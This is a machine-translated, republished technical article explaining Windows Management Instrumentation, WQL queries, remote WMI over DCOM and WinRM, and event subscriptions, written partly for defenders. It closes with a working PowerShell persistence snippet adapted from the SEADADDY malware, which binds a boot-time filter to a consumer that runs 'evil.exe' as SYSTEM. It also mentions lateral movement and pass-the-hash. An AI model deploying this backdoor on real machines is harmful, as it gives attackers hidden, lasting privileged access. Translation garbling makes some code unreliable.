Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use WMI to build a file-free backdoor, and the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Brief introduction

With the upgrading of technology, many technologies have been introduced and abandoned in Windows systems, but there is a very powerful technology that has been continued since Windows NT 4.0 and Windows 95, that is, Windows Management Instrumentation (WMI), that is, Windows management tools. This tool is now available in all Windows systems, and with the toolset it contains, we can manage local or remote computers.

It is known not only by system administrators, but also by security personnel because of the reasons why Stuxnet uses WMI to attack. WMI is popular with hackers because it can provide system information collection, anti-virus detection, code execution, horizontal movement, persistence and data theft.

As more and more hackers use WMI technology, it is very important for defenders to understand WMI knowledge and use it.

This article mainly introduces readers to the main features of WMI, how attackers use WMI, how to bypass IDS through WMI, and how to do forensics through WMI Repository.

WMI Architecture (Architecture)

WMI is Windows's implementation of WBEM and CID standards. The two standards are designed to provide an industry-independent method for collecting and transmitting Managed Component (management components) information in an enterprise environment.

A WMI management component can be a process, a registry key, an installed service or a file information, and so on. These standards are used to communicate and determine what methods implementers should use to query (query), populate (populate), structure (construct), transmit (transmit), perform actions on (perform operations) and consume data (process data).

Managed Components (Management component)

The management component, that is, the object of WMI, is a Class Instances (class instance) that represents highly structured operating system data. Microsoft provides a lot of WMI objects to provide information about the system, such as Win32_Process,Win32_Service,AntiVirusProduct,Win32_StartupCommand, and so on.

Consuming Data (data processing)

Microsoft provides methods for processing WMI data and executing WMI commands. For example, PowerShell provides us with a very simple way to interact with PowerShell.

Querying Data (data query)

All WMI objects can be queried through a query language called WQL, which, like SQL, gives us fine-grained control over the WMI objects returned to the user.

Populating Data (data fill)

When a user requests a WMI object, the WMI service (Winmgmt) needs to know how the data of the request object is populated. This function is done through WMI Providers (WMI provider). An WMI provider is a registry key that has the relevant GUID in the registry. The WMI provider does a lot of actions when populating the data, such as querying all processes, enumerating registry keys, and so on.

When a WMI service populates a WMI object, there are two class instances: Dynamic Object (dynamic object) and Persistent Object (persistent object).

A dynamic object is generated during a query, for example, Win32_Process is a dynamic object.

Persistent objects are stored in CIM Repository (CIM library) and are placed by default in% SystemRoot%\ System32\ wbem\ Repository\ OBJECTS.DATA.

Structuring Data (Construction data)

Most of the structure of the WMI object is described in the Managed Object Format (MOF) (managed object format) file. The MOF file uses C++-like syntax to describe WMI objects.

When the WMI provider generates the raw data, the MOF file pair provides the construction structure of the data. From the defender's point of view, it is worth noting that WMI objects can be defined without going through the MOF file, and attackers can define them by inserting .net code into the CIM library.

Transmitting Data (data transfer)

Microsoft provides two methods for remote transmission of WMI data: DCOM and Windows Remote Management (WinRM).

Performing Actions (perform an operation)

Some WMI objects contain executable methods / functions. For example, the static function Create of the Win32_Process class is often used by hackers to do horizontal movement in the intranet.

WMI also provides an Eventing System (event system) that allows users to register event handlers that are executed when WMI objects are generated, modified, or deleted.

WMI classes and namespaces

Operating system information is represented in the form of WMI objects. A WMI object is also an instance of the WMI class. Most commonly used WMI classes are described in detail in MSDN, such as the Win32_Process class. However, there are many WMI classes that are not documented, but fortunately, we can query all WMI classes through WQL.

Similar to traditional object-oriented programming languages, WMI classes are classified and layered in namespaces. All namespaces are derived from the ROOT namespace, and when no namespace is specified for query, Microsoft uses ROOT\ CIMV2 as the default namespace.

All WMI settings, including the default namespace, are in the following registry key:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ WBEM

The following PowerShell code recursively queries all WMI classes and their namespaces:

Function Get-WmiNamespace {

Param ($Namespace='ROOT')

Get-WmiObject-Namespace $Namespace-Class _ _ NAMESPACE | ForEach-Object {

($ns ='{0}\ {1}'- f $_. _ _ NAMESPACE, $_ .Name)

Get-WmiNamespace-Namespace $ns

}

}

$WmiClasses = Get-WmiNamespace | ForEach-Object {

$Namespace = $_

Get-WmiObject-Namespace $Namespace-List |

ForEach-Object {$_ .Path.Path}

} | Sort-Object-Unique

The returned WMI Class path is as follows:

...

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__AbsoluteTimerInstruction

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ACE

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__AggregateEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ClassCreationEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ClassDeletionEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ClassModificationEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ClassOperationEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ClassProviderRegistration

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ConsumerFailureEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__Event

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventConsumer

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventConsumerProviderRegistration

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventDroppedEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventFilter

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventGenerator

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventProviderRegistration

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__EventQueueOverflowEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ExtendedStatus

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__ExtrinsicEvent

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__FilterToConsumerBinding

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__IndicationRelated

\\ WIN-Q4UUJ0BPKL9\ ROOT\ CIMV2:__InstanceCreationEvent

...

Query WMI

WMI provides a very intuitive syntax for querying instances, classes, and namespaces of WMI objects, namely WQL. WQL queries can generally be divided into the following categories:

Instance Queries (instance query): query WMI object instances.

Event Queries (event query): is equivalent to registering a message when a WMI object is created / modified / deleted.

Meta Queries (meta query): meta queries are used to get meta information about WMI namespaces and class structures.

Instance Queries

This is the most commonly used WQL query. The basic format is as follows:

SELECT [Class property name | *] FROM [CLASS NAME]

For example, the following query returns all running processes with chrome in the executable file name:

SELECT * FROM Win32_Process WHERE Name LIKE "% chrome%"

Event Queries

Event queries are used as a message mechanism to listen for event class triggers. It is commonly used to send a message to the user when an WMI object instance is created / modified / deleted. Depending on whether the message type is intrinsic (native to the system) or extrinsic (third-party), the query statement format is different:

SELECT [Class property name | *] FROM [INTRINSIC CLASS NAME] WITHIN [POLLING INTERVAL]

SELECT [Class property name | *] FROM [EXTRINSIC CLASS NAME]

The following query will be executed when the user logs in:

SELECT * FROM _ _ InstanceCreationEvent WITHIN 15 WHERE TargetInstanceISA 'Win32_LogonSession' AND TargetInstance.LogonType=2

The following query will be executed when the user inserts the removable device:

SELECT * FROM Win32_VolumeChangeEvent Where EventType=2

Meta Queries

Meta queries are used to query information about WMI namespaces and class structures. The most common use is to enumerate the class structure of the WMI namespace. The meta-query is a subset of the instance query, but unlike the object query, we query the definition of the instance of the class. The format is as follows:

SELECT [Class property name | *] FROM [Meta_Class | SYSTEM CLASS NAME]

The following statement queries all WMI classes that begin with WIN32:

SELECT * FROM Meta_Class WHERE _ _ CLASS LIKE "Win32%"

The following statement queries all namespaces under a namespace:

SELECT Name FROM _ _ NAMESPACE

Note that when the specified namespace is not displayed, the default namespace is ROOT\ CIMV2.

Interact with WMI

Microsoft and some third-party software developers provide us with many tools that can interact with WMI. The following is an incomplete list of some tools:

PowerShell

PowerShell is a very powerful scripting language with many features that can interact with WMI. For the PowerShell v3 version, the following are available:

Get-WmiObject

Get-CimAssociatedInstance

Get-CimClass

Get-CimInstance

Get-CimSession

Set-WmiInstance

Set-CimInstance

Invoke-WmiMethod

Invoke-CimMethod

New-CimInstance

New-CimSession

New-CimSessionOption

Register-CimIndicationEvent

Register-WmiEvent

Remove-CimInstance

Remove-WmiObject

Remove-CimSession

The function of the WMI command is similar to the CIM command, but in the v3 version of PowerShell, CIM is more flexible. The biggest advantage of using CIM commands is that they work under the WinRM and DCOM protocols, while the WMI command only supports the DCOM protocol.

From the attacker's point of view, commands specifically used to create / modify / delete WMI/CIM classes do not exist. However, using WMI, you can easily create WMI classes.

PowerShell will be mainly used in the examples in this article because of its flexibility and increasing use by attackers.

Wmic.exe

Wmic.exe is a very powerful command line tool for interacting with WMI. It has a lot of convenient aliases for WMI objects that can be used to make more complex queries.

Wmic.exe can also execute the WMI method, and when an attacker moves horizontally on the intranet, he uses Win32_Process 's Create method. One limitation, however, is that we cannot execute a method that accepts built-in WMI objects. If PowerShell is not available, it is possible to use wmic.exe to collect system information and perform some basic operations, and it is often used by penetration testers and attackers.

Wbemtest.exe

Wbemtest.ext is a powerful graphical tool designed for diagnostic tools. Can be used to enumerate object instances, execute queries, register events, modify WMI objects and classes, and execute locally or remotely. Although the interface is not very friendly, this tool is good for attackers when other tools cannot be used.

WMI Explorer

WMI Explorer is a commercial tool developed by Sapien to find WMI classes. It has a very good interface and can browse WMI libraries in layers. It cannot connect to a remote WMI library and execute queries.

CIM Studio

CIM Studio is free, from Microsoft, you can use it to easily browse the WMI library, it is also good to find WMI classes.

Windows Script Host (WSH) languages

VBScript and JScript, although the two scripting languages provided by Microsoft are not very well known, they are still very powerful in terms of interacting with WMI. In fact, a complete backdoor is developed using these two scripting languages, in which the basic C2 (Command and Control) mechanism is completed using the WMI function.

In addition, we will discuss in more detail later on the EventConsumer (event handling) interface ActiveScriptEventConsumer, which is the only two scripting languages that are valuable to both attackers and defenders.

In any case, VBScript and JScript are still dominant in old systems without a PowerShell environment.

Cmax Candle + via IWbem* COM API

Please check the COM API for WMI for yourself. This interface is also important for reverse engineers if you want to analyze malware that includes WMI functionality in detail.

.NET using System.Management classes

The .NET class library provides several classes for interacting with WMI under the System.Management namespace, and it is easy to write in languages such as C #. In the following example, these classes are used repeatedly in PowerShell code.

Winrm.exe

Winrm.exe can enumerate WMI object instances, call methods, create and delete object instances on the machine where the WinRM service is enabled locally or remotely. Winrm.exe can also be used to configure WinRM services. The ideal way to interact with WMI is to use the PowerShell of the CIM command, but this can be used as an alternative.

Winrm invoke Create wmicimv2/Win32_Process @ {CommandLine= "notepad.exe"; CurrentDirectory= "C:\"}

Winrm enumerate http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process

Winrm get http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_OperatingSystem

Wmic and wmis-pth for Linux

Wmic is a simple Linux command-line tool for executing WMI queries that remotely calls the Create method of Win32_Process. Wmis also receives NTML hashes.

Remote WMI

The power of WMI is reflected in the remote operation. Currently, WMI supports two protocols: DCOM and WinRM, which can be used to do anything, including querying objects, registering events, and methods that execute WMI classes, and so on.

Both protocols are beneficial to attackers because defenders usually do not check for malicious traffic in both protocols. What is needed to take advantage of WMI is the available authorized user credentials. In the wmis-pth tool on the Linux platform, you only need to provide the hash of the attacker's user.

DCOM (Distributed Component Object Model)

DCOM has been used as the default protocol since WMI was introduced. DCOM establishes the TCP connection through port 135, and the subsequent data exchange is transmitted through the randomly selected TCP port. This port can be configured and modified through dcomcnfg.exe, which will eventually change the following registry key:

HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Rpc\ Internet-Ports (REG_MULTI_SZ)

All WMI commands built into PowerShell use the DCOM protocol.

PS C:\ Users\ Michael\ Desktop > Get-WmiObject-Class Win32_Process-ComputerName WIN-Q4UUJ0BPKL9-Credential 'WIN-Q4UUJ0BPKL9\ Administrator'

WinRM (Windows Remote Management)

Recently, WinRM has overtaken DCOM and has been used by Windows as a recommended protocol. WinRM is based on the Web Services-Management (WSMan) specification and is a SOAP-based device management protocol. In addition, PowerShell Remoting is also based on the WinRM specification, which enables us to achieve powerful remote management capabilities in large-scale Windows enterprise environments through PowerShell. WinRM also supports the network operation of WMI, or CIM.

By default, the WinRM service opens and listens on the 5985/tcp port, and it is encrypted by default. HTTPS support can also be implemented on the 5986/tcp port by configuring the certificate.

Through the WSMan virtual drive letter of GPO,winrm.exe and PowerShell, we can easily configure WinRM.

PS C:\ Users\ Michael\ Desktop > ls WSMan:\ localhost

WSManConfig: Microsoft.WSMan.Management\ WSMan::localhost

Type Name SourceOfValue Value

System.String MaxEnvelopeSizekb 500

System.String MaxTimeoutms 60000

System.String MaxBatchItems 32000

System.String MaxProviderRequests 4294967295

Container Client

Container Service

Container Shell

Container Listener

Container Plugin

Container ClientCertificate

PowerShell provides convenient commands to detect whether the WinRM service is listening-Test-WSMan.

If Test-WSMan returns a result, the WinRM service is normal, and no authentication information is required for this command.

PS C:\ Users\ Michael > Test-WSMan-ComputerName WIN-JF74R0AP7LN

Wsmid: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd

ProtocolVersion: http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd

ProductVendor: Microsoft Corporation

ProductVersion: OS: 0.0.0 SP: 0.0 Stack: 3.0

If you want to interact remotely with the WMI of a system running the WinRM service, there are two commands available: winrm.exe and PowerShell's CIM command.

PS C:\ Users\ Michael > $s = New-CimSession-ComputerName win-Credential 'win\ Michael'-Authentication Negotiate

PS C:\ Users\ Michael > Get-CimInstance-CimSession $s-ClassName Win32_Process

ProcessId Name HandleCount WorkingSetSize VirtualSize PSComputerName

-

0 System Idle P... 0 24576 0 win

4 System 545 839680 4771840 win

244 smss.exe 29 1056768 5234688 win

332 csrss.exe 664 4886528 97574912 win

372 wininit.exe 76 4255744 45420544 win

380 csrss.exe 290 15814656 168321024 win

...

3528 SGTool.exe 323 21172224 180084736 win

2808 WmiApSrv.exe 121 6074368 32092160 win

WMI Eventing (WMI event)

One of the most powerful features for both attackers and defenders is that WMI has the ability to respond to WMI events asynchronously. With proper exception handling, WMI events can basically be used to respond to all operating system events.

There are two types of WMI events, including events for a single process running in the local context and persistent WMI event subscriptions. (There are two classes of WMI events those that run locally in the context of a single process and permanent WMI event subscriptions.)

Local events have lifecycles that host processes, while persistent WMI events are stored in the WMI library, run with SYSTEM privileges, and still exist after restart.

Eventing Requirements (event request)

In order to install a permanent WMI event subscription, three conditions must be met:

An event filter

An event handling: represents an action that starts when an event is triggered

A filter that handles binding: represents a registration mechanism that binds a filter to an event handler

Event FIlters (event filter)

An event filter receives an WMI event query parameter and saves it to an instance of the ROOT\ subscription:__EventFilter object.

Event filters support the following types of queries:

Intrinsic Events

Intrinsic Events is triggered when a WMI class or object is created, modified, or deleted to pass information to the startup timer or the WMI method to be executed. The following Intrinsic Events is found in all WMI namespaces and is named in the form of a system class (starting with two underscores):

_ _ NamespaceOperationEvent

_ _ NamespaceModificationEvent

_ _ NamespaceDeletionEvent

_ _ NamespaceCreationEvent

_ _ ClassOperationEvent

_ _ ClassDeletionEvent

_ _ ClassModificationEvent

_ _ ClassCreationEvent

_ _ InstanceOperationEvent

_ _ InstanceCreationEvent

_ _ MethodIvocationEvent

_ _ InstanceModificationEvent

_ _ InstanceDeletionEvent

_ _ TimerEvent

These events are very powerful because they can be used to trigger any operating system event you can imagine. For example, a person can trigger an event when a user logs in with the following name:

SELECT * FROM _ _ InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType=2

The above query means that an event is triggered when an instance of the Win32_LogonSession class with a login type of 2 (interactive login) is created.

Because the call time of a particular Intrinsic Event is different, we must specify a Polling Interval (time interval) in the query, that is, occasionally we will not be able to trigger such events. For example, the goal of an event query is the creation of an instance of the WMI class. If the instance is generated and destroyed within the specified time interval, then the event will not be queried.

Extrinsic Events

Extrinsic Events solves the problem of Intrinsic Events interval, because when an event occurs, an Extrinsic Event is triggered immediately, but the disadvantage is that there are not many Extrinsic Events in the current WMI, but these are also powerful:

ROOT\ CIMV2:Win32_ComputerShutdownEvent

ROOT\ CIMV2:Win32_ProcessStartTrace

ROOT\ CIMV2:Win32_ModuleLoadTrace

ROOT\ CIMV2:Win32_ThreadStartTrace

ROOT\ CIMV2:Win32_VolumnChangeEvent

ROOT\ DEFAULT:Msft_WmiProvider*

ROOT\ DEFAULT:RegistryKeyChangeEvent

ROOT\ DEFAULT:RegistryValueChangeEvent

The following command can query all modules of each process in user mode and kernel mode:

SELECT * FROM Win32_ModuleLoadTrace

Event Consumers (event handling)

An Event Consumer represents the action that takes place when an event is triggered. Available standard event handling classes:

LogFileEventConsumer: writes event data to the specified log file

ActiveScriptEventConsumer: used to execute VBScript/JScript programs

NTEventLogEventConsumer: create a log entry point that contains event data

SMTPEventConsumer: send event data by email

CommandLineEventConsumer: execute a command

As you can imagine, the ActiveScriptEventConsumer and CommandLineEventConsumer classes should be the most frequently used by attackers when handling events. Both event handling classes provide attacks with the flexibility to execute arbitrary code without a file.

All event handling classes inherit from the _ _ EventConsumer class.

Malicious WMI persistence instance

The following PowerShell code comes from a modified version of malware called SEADADDY, which is used to persist through WMI. Event filtering is the persistence module of PowerSploit, which is used to trigger when the system is started, and event handling executes a program with SYSTEM privileges.

$filterName = 'BotFilter82'

$consumerName = 'BotConsumer23'

$exePath ='C:\ Windows\ System32\ evil.exe'

$Query = "SELECT * FROM _ _ InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime > = 200 AND TargetInstance.SystemUpTime < 320"

$WMIEventFilter = Set-WmiInstance-Class _ _ EventFilter-NameSpace "root\ subscription"-Arguments @ {Name=$filterName;EventNameSpace= "root\ cimv2"; QueryLanguage= "WQL"; Query=$Query}-ErrorAction Stop

$WMIEventConsumer = Set-WmiInstance-Class CommandLineEventConsumer-Namespace "root\ subscription"-Arguments @ {Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}

Set-WmiInstance-Class _ _ FilterToConsumerBinding-Namespace "root\ subscription"-Arguments @ {Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

On how to use WMI to build a file-free backdoor to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.